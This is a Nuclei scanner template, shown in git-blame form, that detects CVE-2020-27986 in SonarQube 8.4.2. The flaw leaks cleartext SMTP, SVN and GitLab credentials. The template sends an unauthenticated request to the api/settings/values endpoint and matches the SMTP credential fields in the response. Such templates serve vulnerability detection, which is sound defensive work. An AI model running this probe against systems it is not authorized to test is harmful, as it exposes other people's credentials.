2021-01-30 09:51:50 +00:00
|
|
|
id: CVE-2020-27986
|
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: SonarQube - Authentication Bypass
|
2021-01-30 09:51:50 +00:00
|
|
|
author: pikpikcu
|
2021-09-10 11:26:40 +00:00
|
|
|
severity: high
|
2021-01-30 09:51:50 +00:00
|
|
|
description: |
|
2021-08-19 14:44:46 +00:00
|
|
|
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
|
|
|
|
SVN, and GitLab credentials via the api/settings/values URI.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.
|
2023-09-06 12:22:36 +00:00
|
|
|
remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
|
2022-07-26 13:45:11 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-27866
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/SexyBeast233/SecBooks
|
|
|
|
- https://github.com/SouthWind0/southwind0.github.io
|
|
|
|
- https://github.com/Z0fhack/Goby_POC
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2020-27986
|
2023-07-11 19:49:27 +00:00
|
|
|
cwe-id: CWE-306
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.3688
|
|
|
|
epss-percentile: 0.97174
|
2023-09-06 12:22:36 +00:00
|
|
|
cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: sonarsource
|
|
|
|
product: sonarqube
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2020,sonarqube,sonarsource
|
2021-01-30 09:51:50 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-01-30 09:51:50 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/settings/values"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-07-11 19:49:27 +00:00
|
|
|
part: body
|
2021-01-30 09:51:50 +00:00
|
|
|
words:
|
2021-01-30 13:52:02 +00:00
|
|
|
- email.smtp_host.secured
|
|
|
|
- email.smtp_password.secured
|
|
|
|
- email.smtp_port.secured
|
|
|
|
- email.smtp_username.secured
|
2021-03-10 14:03:49 +00:00
|
|
|
condition: and
|
2023-07-11 19:49:27 +00:00
|
|
|
|
2021-01-30 09:51:50 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4b0a00483046022100cb7f58cb5673f8053ed5ad66af0605d5d46519262e62342506a7219274f0a748022100b4f6625f370ff8dbc8c5b0437ec95cee595bda01458944bcc7c1985cae793bb6:922c64590222798bb761d5b6d8e72950
|